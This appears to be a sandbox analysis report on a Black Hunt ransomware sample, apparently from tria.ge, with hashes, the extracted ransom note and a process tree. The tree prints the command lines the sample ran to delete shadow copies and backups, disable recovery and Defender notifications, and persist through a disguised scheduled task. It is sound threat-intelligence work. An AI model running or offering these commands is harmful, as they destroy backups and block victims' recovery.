Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/01/2024, 22:44

General

  • Target

    20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe

  • Size

    707KB

  • MD5

    e6e042228afcc18239f234c4e9d44d55

  • SHA1

    bfec002de8e368ea515c656a9cc8c200f357b0eb

  • SHA256

    20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5

  • SHA512

    50447dbb92b15d5f332cbd4129b7dcadd0e04849f6bf1c75a94f19bf49f7903c9a2a98bb47e48c32f91bdd3dc8e5912689b11853fdb94e06d1a246b754663aa6

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8xvnh:6uaTmkZJ+naie5OTamgEoKxLWSlh

Malware Config

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> [email protected] </span>this ID (<span> hWezMiQuH1z5vuoC </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> [email protected] </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (537) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 12 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
    "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1184
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
        PID:5080
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
          3⤵
            PID:4828
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
            3⤵
              PID:1180
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4484
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
              3⤵
              • Modifies registry class
              PID:4532
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2540
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
              3⤵
                PID:2404
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
              2⤵
                PID:676
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:5024
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:3680
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                  2⤵
                    PID:3616
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                      3⤵
                        PID:4444
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                      2⤵
                        PID:3680
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                          3⤵
                          • Interacts with shadow copies
                          PID:7320
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                        2⤵
                          PID:3864
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                            3⤵
                            • Modifies boot configuration data using bcdedit
                            PID:6748
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                          2⤵
                            PID:3056
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                              3⤵
                                PID:5052
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                              2⤵
                                PID:4712
                                • C:\Windows\system32\wbadmin.exe
                                  wbadmin.exe delete catalog -quiet
                                  3⤵
                                  • Deletes backup catalog
                                  PID:7024
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                2⤵
                                  PID:1576
                                  • C:\Windows\system32\fsutil.exe
                                    fsutil.exe usn deletejournal /D C:
                                    3⤵
                                    • Deletes NTFS Change Journal
                                    PID:7744
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                  2⤵
                                    PID:3508
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                      3⤵
                                        PID:3648
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                      2⤵
                                        PID:4836
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                        2⤵
                                          PID:4232
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                          2⤵
                                            PID:4752
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                            2⤵
                                              PID:3140
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F
                                              2⤵
                                                PID:644
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:1504
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:4468
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:2720
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:3860
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:5080
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                          3⤵
                                                          • Modifies registry class
                                                          PID:4272
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:2348
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:3500
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:3012
                                                            • C:\Windows\System32\cmd.exe
